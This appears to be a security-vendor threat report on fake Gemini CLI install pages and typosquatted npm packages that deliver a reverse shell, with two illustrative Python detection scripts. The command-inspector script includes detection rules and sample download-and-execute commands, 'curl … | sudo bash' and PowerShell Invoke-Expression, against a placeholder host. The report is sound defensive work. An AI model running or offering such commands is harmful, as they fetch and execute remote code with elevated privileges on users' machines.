What did the researchers find?
Researchers identified several active campaigns exploiting the growing popularity of AI developer tools. During the investigation, they uncovered three separate but related operations built around the Gemini CLI brand:
- Fake Gemini CLI websites targeting macOS users
- Malicious PowerShell installers targeting Windows users
- Typosquatting attempts involving fake npm packages
The attacks targeted both macOS and Windows users through fake websites, cloned repositories, and deceptive posts shared on forums and social media communities. These pages and messages were designed to look convincing enough for users to copy, paste, and run the malicious commands themselves.
The malware delivered through these campaigns was identified as a reverse shell. Rather than simply infecting the device, a reverse shell connects the victim’s machine directly to the attacker and gives the attacker remote access to it. Once active, the malware allowed attackers to execute commands, steal data, install additional payloads, and maintain persistent access to the infected device.
How the fake Gemini CLI campaigns work
While the delivery methods varied between macOS and Windows, each campaign started with the same trick — a convincing fake Gemini CLI setup page or installation guide that pushed users to run malicious commands. Below, we break down how the attacks unfolded on each platform.
Campaign 1: Fake Gemini CLI websites targeting macOS users
In the macOS campaign, attackers created fake Gemini CLI websites that closely resembled the official setup page. Users visiting the site saw what looked like normal installation instructions and a command they were told to run in Terminal.
The command was Base64 encoded, meaning the attackers hid the real command inside scrambled-looking text to make it less suspicious at first glance. Once decoded, it connected to the malicious domain “6zo.my,” downloaded a PHP script called “serve.php,” and executed it with administrator privileges using “sudo bash.”
Because the script ran with elevated permissions, the malware gained broad access to the system immediately after execution.
Campaign 2: Malicious PowerShell installers targeting Windows users
The Windows campaign used a similar idea, but instead of Terminal, attackers used a PowerShell command disguised as part of a legitimate Gemini CLI installation process. Attackers filled the script with harmless-looking variable names such as “$Install='GeminiCLI'” and fake version information to make it appear authentic.
In reality, the command connected to a malicious server, downloaded malware, and executed it directly in the device’s memory using “Invoke-Expression.” This fileless execution method makes detection more difficult because the malware does not rely on a traditional executable file stored on the device. Instead, the malicious code runs directly in memory, which helps it evade older antivirus tools that mainly scan files saved on disk.
Campaign 3: Typosquatting attempts involving fake npm packages
Researchers also uncovered attempts to abuse the npm ecosystem through typosquatting. Attackers created fake package names such as “gemini-cli” and “gemini/cli,” which closely resembled the legitimate package “@google/gemini-cli.”
The campaign relied on a common developer habit — skipping the organization name when searching for or installing packages. Someone typing quickly could easily mistake the fake package for the real one.
At the time of analysis, the fake packages had not yet appeared in the public npm registry. However, the preparation itself pointed to an active and potentially imminent threat.
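The naming confusion described above can be checked mechanically before anything is installed. The following is an added example, not code from the researchers: it flags dependency names that collapse to the same letters as the legitimate package once scope and separators are ignored, or that sit within a small edit of it. The function names, the 0.85 similarity threshold, and the sample manifest are assumptions made for illustration.

```python
import difflib
import json
import re

LEGIT = "@google/gemini-cli"  # the only legitimate name, per the article


def squash(name):
    """Lower-case a name and strip everything except letters and digits."""
    return re.sub(r"[^a-z0-9]", "", name.lower())


def classify(name, legit=LEGIT, threshold=0.85):
    """Return 'ok', 'lookalike' or 'unrelated' for one dependency name."""
    if name == legit:
        return "ok"
    legit_base = squash(legit.split("/", 1)[1])
    # Compare the whole name and the part after any scope, so both a
    # missing scope and a wrong scope are caught.
    for cand in {squash(name), squash(name.split("/", 1)[-1])}:
        if difflib.SequenceMatcher(None, cand, legit_base).ratio() >= threshold:
            return "lookalike"
    return "unrelated"


def audit_manifest(manifest_text):
    """Map each look-alike dependency in a package.json to its version spec."""
    manifest = json.loads(manifest_text)
    flagged = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in manifest.get(section, {}).items():
            if classify(name) == "lookalike":
                flagged[name] = spec
    return flagged


# Constructed manifest for the demonstration; versions are made up.
SAMPLE_MANIFEST = json.dumps({
    "dependencies": {"@google/gemini-cli": "^1.0.0", "typescript": "^5.0.0"},
    "devDependencies": {"gemini-cli": "^0.1.0"},
})

if __name__ == "__main__":
    for candidate in ("@google/gemini-cli", "gemini-cli", "gemini/cli", "typescript"):
        print(f"{candidate:22} {classify(candidate)}")
    print("flagged in manifest:", audit_manifest(SAMPLE_MANIFEST))
```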
What happens after execution?
Once the malicious payload runs, the attacker gains unrestricted remote access to the victim’s machine.
Researchers found that the malware establishes a reverse shell connection between the compromised device and the attacker’s server. That connection allows attackers to interact with the victim’s computer remotely as if they were physically sitting in front of it.
This level of access allows attackers to:
- steal files and credentials.
- install additional malware.
- monitor user activity.
- execute arbitrary commands.
- maintain long-term persistence on the system.
For developers, the risks can become even more serious. A compromised machine may contain source code, SSH keys, API tokens, internal documentation, or access to company infrastructure. In a corporate environment, attackers may also use the infected device as a pivot point to move deeper into internal networks and connected systems.
Why are these campaigns so effective?
These attacks work because they blend into normal developer behavior. Developers constantly install tools, copy commands from documentation, and test new software. Attackers understand that a familiar-looking install page or Terminal command can lower suspicion, especially when the tool involves a popular AI platform generating massive attention online.
The campaigns also rely on technical tricks designed to avoid quick detection. Base64 encoding hides the real purpose of commands from users, while fileless PowerShell execution helps malware bypass traditional antivirus software. The fake npm packages exploit small naming differences that are easy to miss during a fast install.
In many cases, the victim unknowingly performs every step of the attack themselves.
How to recognize these and protect yourself
As AI tools become more popular, verifying what you install becomes just as important as what you build with them. Developers should treat install commands with the same caution as downloaded files or email attachments:
- Use official vendor repositories and documentation. Be skeptical of websites, forum posts, or social media messages offering unofficial, beta, or early-access versions of popular AI tools.
- Verify the full package name. For Gemini CLI, the only legitimate package is “@google/gemini-cli.”
- Avoid blindly copying commands into Terminal or PowerShell. Inspect encoded or overly complex commands before running them. Commands that contain long encoded strings, hidden variables, or instructions that immediately download and execute remote content should raise red flags. PowerShell commands using “Invoke-Expression” also deserve extra scrutiny because attackers commonly use them in fileless malware attacks.
- Use real-time threat protection. Security tools with behavioral detection can also help identify suspicious activity that traditional file-based antivirus tools may miss. NordVPN’s Threat Protection Pro™ can help block malicious domains and dangerous downloads before they compromise a device.
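One way to carry out the "inspect before running" advice for the Terminal and PowerShell commands described in the two campaigns, as an added example that is not code from the researchers: it decodes Base64-looking runs in a pasted command and reports download, pipe-to-shell, sudo, and Invoke-Expression indicators in both the visible and the hidden text. The rule names, the length threshold for a Base64 run, and the sample commands are assumptions; the samples are constructed and use the placeholder host example.invalid.

```python
import base64
import binascii
import re

# Heuristics for the behaviours the article describes (names are this example's own).
RULES = {
    "download": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|DownloadString)\b", re.I),
    "pipe-to-shell": re.compile(r"\|\s*(sudo\s+)?(ba|z)?sh\b", re.I),
    "sudo": re.compile(r"\bsudo\b"),
    "invoke-expression": re.compile(r"\b(Invoke-Expression|iex)\b", re.I),
}
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_blobs(text):
    """Return readable strings recovered from Base64-looking runs in text."""
    found = []
    for run in B64_RUN.findall(text):
        try:
            raw = base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
            plain = raw.decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not Base64, or not text once decoded
        if all(ch.isprintable() or ch.isspace() for ch in plain):
            found.append(plain)
    return found


def inspect_command(cmd, depth=0):
    """Return the set of rule names hit by cmd or by text Base64-hidden inside it."""
    hits = {name for name, rx in RULES.items() if rx.search(cmd)}
    if depth < 3:  # follow nested encoding, but bound the recursion
        for plain in decode_blobs(cmd):
            hits.add("base64-hidden")
            hits |= inspect_command(plain, depth + 1)
    return hits


# Constructed samples. example.invalid is a placeholder host, not one from the report.
HIDDEN = "curl -fsSL https://example.invalid/serve.php | sudo bash"
MAC_SAMPLE = "echo " + base64.b64encode(HIDDEN.encode()).decode() + " | base64 -d | sh"
WIN_SAMPLE = ("$Install='GeminiCLI'; "
              "Invoke-Expression (Invoke-WebRequest https://example.invalid/i.ps1).Content")
BENIGN = "npm install -g @google/gemini-cli"

if __name__ == "__main__":
    for sample in (MAC_SAMPLE, WIN_SAMPLE, BENIGN):
        print(sorted(inspect_command(sample)) or "no findings", "<-", sample[:60])
```

An empty result means only that none of these heuristics fired, not that a command is safe.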
Methodology
The NordVPN Threat Intelligence team analyzed multiple campaigns impersonating Gemini CLI across macOS and Windows environments. Researchers examined phishing websites, cloned setup pages, encoded Terminal commands, PowerShell payloads, malicious domains, and typosquatting attempts targeting the npm ecosystem. All findings were cross-checked through technical analysis to distinguish actively malicious infrastructure from unrelated or lookalike resources.